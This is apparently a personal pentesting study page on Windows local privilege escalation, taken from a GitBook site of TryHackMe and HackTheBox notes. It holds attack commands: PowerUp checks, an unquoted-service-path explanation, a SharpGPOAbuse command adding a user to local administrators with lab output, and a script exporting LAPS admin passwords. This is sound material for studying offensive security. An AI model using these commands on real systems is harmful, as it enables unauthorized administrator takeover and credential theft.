Practice
  • 🛤️TryHackMe Rooms
    • HackersVsHackers
    • Vulnnet - The End Game
    • Surfer
    • Corridor
    • Mustacchio
    • Wordpress: CVE-2021-29447
    • Bounty Hacker
    • Simple CTF
    • Agent Sudo
    • Lazy Admin
    • Ignite
    • Brooklynn 99
    • c4ptur3th3fl4g
    • Lian_Yu
    • Rabbit
    • Gallery
    • Overpass
    • Team
    • Easy Peasy
    • CmesS
    • Ultratech
    • Wonderland
    • Anonymous
    • GamingServer
    • Tomghost
    • ConvertMyVideo
    • DogCat
    • Blog
    • Git Happens
    • 0day
    • Road
    • Inferno
    • Opacity
    • Market Place
    • Valley CTF
    • Weasel
    • SafeZone
    • Blueprint
    • Fusion Corp
    • Quotient
    • Unbaked Pie
    • Kenobi
    • Steel Mountain
    • Alfred
    • Hack Park
    • Game Zone
    • Daily Bugle
    • Retro
    • Corp
    • Attacktive Directory
    • Vulnnet - Roasted
    • Vulnnet - Active
    • Vulnnet - Internal
    • Enterprise - Hard
    • Iron Corp - Hard
    • Ra - Hard
    • For Business Reasons
  • 📦HackTheBox
    • Linux Boxes
      • Lame
      • Shocker
      • Nibbles
      • Beep
      • Cronos
      • Nineveh
      • Sense
      • Solidstate
      • Node
      • Valentine
      • Poison
      • Sunday
      • Irked
      • FriendZone
      • Networked
      • Jarvis
      • Tabby
      • Mirai
      • Popcorn
    • Windows Boxes
      • Active
      • Forest
      • ChatterBox
      • Resolute
      • Intelligence
  • 🤖CTF's
    • CloudSEK CTFs
    • ACM Cyber - UCLA
  • ¯\_(ツ)_/¯
    • Interview Topics
  • 🪣BOF - OSCP
    • Basics
    • Spiking
    • FUZZing
    • Finding the Offset
    • Overwriting the EIP
    • Finding BAD Characters
    • Finding RIGHT Module
    • Generating Shellcode
  • 📛Active Directory
    • Basics
      • Managing AD Users
      • Managing AD Computers
      • Group Policies
      • Authentication Methods
      • Trees, Forests and Trusts
    • Enumeration Techniques
    • Initial Attack Vectors
    • Post Compromise Enumeration
    • Post Compromise Attacks
      • Token Impersonation - LM
      • Kerberoasting
      • cPassword / GPP Attack
      • URL File Attacks
      • PrintNightmare
      • Golden Ticket Attacks
      • ZeroLogon Attacks
    • Lateral Movement and Pivoting
      • File Transfers
      • Spawning Processes Remotely
      • Moving Laterally with WMI
      • Alternate Authentication Material
      • Abusing User's Behaviour
      • Port Forwarding
      • Maintaing Access
      • Pivoting
      • Cleaning Up
    • Other Resources
  • 🛡️Powershell Basics
    • Getting Started
      • Functions
  • 😁Others
    • API Security
    • Cloud Security
  • Enumeration
    • Local PrivEsc
    • Remoting
    • Persistence
    • Kerberos
Powered by GitBook
On this page
  • AlwaysInstallElevated
  • Abusing GPO permissions
  • Export LAPS Passwords
  1. Enumeration

Local PrivEsc

PreviousEnumerationNextRemoting

Last updated 1 year ago

. .\PowerUp.sp1
Invoke-AllChecks

Get-ServiceUnquoted -Verbose
Get-ModifiableServiceFile -Verbose
Get-ModifiableService -Verbose

.\beRoot.exe
Invoke-PrivEsc

  • Find for some Unquoted Service Path Vulnerabilities

  • Check for some modifiable registry autoruns and configs

Unquoted service path is when a Windows service is installed, it is associated with an executable file that defines what the service does

This executable file is specified by a file path. If the file path contains spaces and is not enclosed in quotation marks, Windows might misinterpret it - allowing attackers to replace the payload with the original executable

  • Now restart the machine so that the service gets restarted !

AlwaysInstallElevated

  • AlwaysInstallElevated is a type of Registry Escalation, this is equivalent to granting full control just like the admin rights - An attacker can potentially drop a malicious msi and get a reverse shell

  • Refer this

Abusing GPO permissions

We Abusing GPO by adding the user to the local Administrators group leveraging a tool called SharpGPOAbuse.exe

# Add user to local administrator groups

PS C:\Enterprise-Share> .\SharpGPOAbuse.exe --AddComputerTask --TaskName "Debug" --Author vulnnet\administrator --Command "cmd.exe" --Arguments "/c net localgroup administrators enterprise-security /add" --GPOName "SECURITY-POL-VN"
[+] Domain = vulnnet.local
[+] Domain Controller = VULNNET-BC3TCK1SHNQ.vulnnet.local
[+] Distinguished Name = CN=Policies,CN=System,DC=vulnnet,DC=local
[+] GUID of "SECURITY-POL-VN" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] Creating file \\vulnnet.local\SysVol\vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.
[+] Done!

Export LAPS Passwords

$Computers = Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$Computers | Sort-Object ms-Mcs-AdmPwdExpirationTime | Format-Table -AutoSize Name, DnsHostName, ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$computers | Export-Csv -path c:\temp\"LAPS-$((Get-Date).ToString("MM-dd-yyyy")).csv" -NoTypeInformation

Save it

C:\Scripts\LAPSexport.ps1

Then, run the script to verify it works correctly. If it does, you should automate this procedure by creating a Scheduled Task

writeup